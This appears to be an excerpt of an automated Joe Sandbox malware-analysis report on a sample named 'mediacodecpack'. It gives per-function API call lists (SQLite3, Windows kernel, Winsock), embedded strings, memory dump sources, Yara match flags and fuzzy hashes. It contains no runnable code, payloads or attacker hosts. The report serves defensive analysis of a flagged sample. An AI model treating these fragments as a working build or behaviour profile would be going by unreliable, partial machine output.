                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 2877408194-0
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D424A9
• RtlEnterCriticalSection.NTDLL(?), ref: 02D424B8
• InterlockedExchange.KERNEL32(?,00000001), ref: 02D424CD
• RtlLeaveCriticalSection.NTDLL(?), ref: 02D424D4
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 609084E9
• sqlite3_mutex_leave.SQLITE3 ref: 60908518
• sqlite3_mutex_enter.SQLITE3 ref: 60908528
• sqlite3_mutex_leave.SQLITE3 ref: 6090855B
Memory Dump Source
• Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
APIs
• __EH_prolog.LIBCMT ref: 02D42009
• RtlDeleteCriticalSection.NTDLL(?), ref: 02D42028
• CloseHandle.KERNEL32(00000000), ref: 02D42037
• CloseHandle.KERNEL32(00000000), ref: 02D4204E
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CriticalDeleteH_prologSection
• String ID:
• API String ID: 2456309408-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: Event$H_prologSleep
• String ID:
• API String ID: 1765829285-0
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_log
• String ID: into$out of
• API String ID: 632333372-1114767565
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmove
• String ID: &'
• API String ID: 3529519853-655172784
APIs
  • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
• sqlite3_free.SQLITE3 ref: 609193A3
Strings
Memory Dump Source
• Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_freesqlite3_value_text
• String ID: (NULL)$NULL
• API String ID: 2175239460-873412390
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_log
• String ID: -- $d
• API String ID: 632333372-777087308
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_log
• String ID: string or blob too big$|
• API String ID: 632333372-330586046
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_logsqlite3_value_text
• String ID: string or blob too big
• API String ID: 2320820228-2803948771
APIs
• WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D473D7,?,?,00000000), ref: 02D486D4
• getsockname.WS2_32(?,?,?), ref: 02D486EA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: ErrorLastgetsockname
• String ID: &'
• API String ID: 566540725-655172784
APIs
• __EH_prolog.LIBCMT ref: 02D4BCB8
  • Part of subcall function 02D4C294: std::exception::exception.LIBCMT ref: 02D4C2C3
  • Part of subcall function 02D4CA4A: __EH_prolog.LIBCMT ref: 02D4CA4F
  • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
  • Part of subcall function 02D4C2F3: __EH_prolog.LIBCMT ref: 02D4C2F8
Strings
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D4BCEE
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D4BCF5
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 1953324306-1943798000
                                                                                            • Opcode ID: 06f4bdf46651ea0d105d934e4fa4f05b5e486db80266b73ddc06ae262c9fa161
                                                                                            • Instruction ID: 028d3e28685c5892442f1675762daa81f094796f71959442d7c598f607799af3
                                                                                            • Opcode Fuzzy Hash: 06f4bdf46651ea0d105d934e4fa4f05b5e486db80266b73ddc06ae262c9fa161
                                                                                            • Instruction Fuzzy Hash: 2C216D71E012589BDB14EBE8E4586AEBBB5EF24704F04449EEC06B7380DF745E04CBA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4BDAD
                                                                                              • Part of subcall function 02D4C36B: std::exception::exception.LIBCMT ref: 02D4C398
                                                                                              • Part of subcall function 02D4CB81: __EH_prolog.LIBCMT ref: 02D4CB86
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                              • Part of subcall function 02D4C3C8: __EH_prolog.LIBCMT ref: 02D4C3CD
                                                                                            Strings
                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D4BDE3
                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D4BDEA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                            • API String ID: 1953324306-412195191
                                                                                            • Opcode ID: 973e80dfeeeafe483ca357bc4b7a8a1a0d27e985902ec4f255b5927dfad5a9a9
                                                                                            • Instruction ID: 2c9942a01953ccc92f8f03c189ed91c32940ab676c4908654d1de4e28f6c543b
                                                                                            • Opcode Fuzzy Hash: 973e80dfeeeafe483ca357bc4b7a8a1a0d27e985902ec4f255b5927dfad5a9a9
                                                                                            • Instruction Fuzzy Hash: E4219E71E052149BEB04EBE8E4586AEBBB5EF64704F04455EED05A7340DF745E08CFA1
                                                                                            APIs
                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                            • String ID:
                                                                                            • API String ID: 3265351223-3916222277
                                                                                            • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                            • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                            • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                            • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp
                                                                                            • String ID: log
                                                                                            • API String ID: 912767213-2403297477
                                                                                            • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                            • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                            • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                            • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4396A
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02D439C1
                                                                                              • Part of subcall function 02D41410: std::exception::exception.LIBCMT ref: 02D41428
                                                                                              • Part of subcall function 02D49622: __EH_prolog.LIBCMT ref: 02D49627
                                                                                              • Part of subcall function 02D49622: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D49636
                                                                                              • Part of subcall function 02D49622: __CxxThrowException@8.LIBCMT ref: 02D49655
                                                                                            Strings
                                                                                            • Day of month is not valid for year, xrefs: 02D439AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Day of month is not valid for year
                                                                                            • API String ID: 1404951899-1521898139
                                                                                            • Opcode ID: ddb2ae83ecc70d81f61e0a3e1fdca63785830bee5e388a3127b6775194352007
                                                                                            • Instruction ID: 13afe437343a32f608f106e69a616672af9b974a22f815213212701a4896a92e
                                                                                            • Opcode Fuzzy Hash: ddb2ae83ecc70d81f61e0a3e1fdca63785830bee5e388a3127b6775194352007
                                                                                            • Instruction Fuzzy Hash: 3B019E36814249ABDF04EFA4D809AEEBB79FF18710F10441AEC04A3300EB748F55CBA5
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_strnicmp
                                                                                            • String ID: SQLITE_
                                                                                            • API String ID: 1961171630-787686576
                                                                                            • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                            • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                            • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                            • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                            APIs
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                            • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                            Strings
                                                                                            • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID: Invalid argument to rtreedepth()
                                                                                            • API String ID: 1063208240-2843521569
                                                                                            • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                            • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                            • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                            • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                            APIs
                                                                                            • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                              • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                              • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                              • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                              • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                            • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: soft_heap_limit
                                                                                            • API String ID: 1251656441-405162809
                                                                                            • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                            • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                            • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                            • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                            APIs
                                                                                            • std::exception::exception.LIBCMT ref: 02D4EB1B
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02D4EB30
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 4063778783-2104205924
                                                                                            • Opcode ID: 11df5adf9008f098e62f74762073052ef06ff26eb6b330fde8970593a5f1f747
                                                                                            • Instruction ID: 68380270e26a96588dff8f058ab3a561e1052ae8dd24efb9a15f46709572fe79
                                                                                            • Opcode Fuzzy Hash: 11df5adf9008f098e62f74762073052ef06ff26eb6b330fde8970593a5f1f747
                                                                                            • Instruction Fuzzy Hash: 2EF082B5A4021A67DF04AAA88859DAF73ECDB04614F500569A911F3381EFB1EE0485A1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D43C1B
                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02D43C30
                                                                                              • Part of subcall function 02D514C7: std::exception::exception.LIBCMT ref: 02D514D1
                                                                                              • Part of subcall function 02D4965B: __EH_prolog.LIBCMT ref: 02D49660
                                                                                              • Part of subcall function 02D4965B: __CxxThrowException@8.LIBCMT ref: 02D49689
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                            • String ID: bad cast
                                                                                            • API String ID: 1300498068-3145022300
                                                                                            • Opcode ID: 40e917e8963a80452275586591018ba90173fe1eacf12cde9539ed866d6b1dfb
                                                                                            • Instruction ID: d2d4516f851dceb46319a15dc2cb22d9f315ad642c5870afcd978d0d2c561c27
                                                                                            • Opcode Fuzzy Hash: 40e917e8963a80452275586591018ba90173fe1eacf12cde9539ed866d6b1dfb
                                                                                            • Instruction Fuzzy Hash: 8EF02732900104CBC708DF58D4446EAB775EF12325F1000AEED0A57300CB728E06CAA0
APIs
• sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
• sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
Strings
Memory Dump Source
• Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_log
• String ID: NULL
• API String ID: 632333372-324932091
APIs
• __EH_prolog.LIBCMT ref: 02D438D2
• std::runtime_error::runtime_error.LIBCPMT ref: 02D438F1
  • Part of subcall function 02D41410: std::exception::exception.LIBCMT ref: 02D41428
  • Part of subcall function 02D47990: _memmove.LIBCMT ref: 02D479B0
Strings
• Year is out of valid range: 1400..10000, xrefs: 02D438E0
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Year is out of valid range: 1400..10000
• API String ID: 3258419250-2344417016
APIs
• __EH_prolog.LIBCMT ref: 02D43886
• std::runtime_error::runtime_error.LIBCPMT ref: 02D438A5
  • Part of subcall function 02D41410: std::exception::exception.LIBCMT ref: 02D41428
  • Part of subcall function 02D47990: _memmove.LIBCMT ref: 02D479B0
Strings
• Day of month value is out of range 1..31, xrefs: 02D43894
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Day of month value is out of range 1..31
• API String ID: 3258419250-1361117730
APIs
• __EH_prolog.LIBCMT ref: 02D4391E
• std::runtime_error::runtime_error.LIBCPMT ref: 02D4393D
  • Part of subcall function 02D41410: std::exception::exception.LIBCMT ref: 02D41428
  • Part of subcall function 02D47990: _memmove.LIBCMT ref: 02D479B0
Strings
• Month number is out of range 1..12, xrefs: 02D4392C
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Month number is out of range 1..12
• API String ID: 3258419250-4198407886
APIs
• TlsAlloc.KERNEL32 ref: 02D419CC
• GetLastError.KERNEL32 ref: 02D419D9
  • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
Strings
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: AllocErrorH_prologLast
• String ID: tss
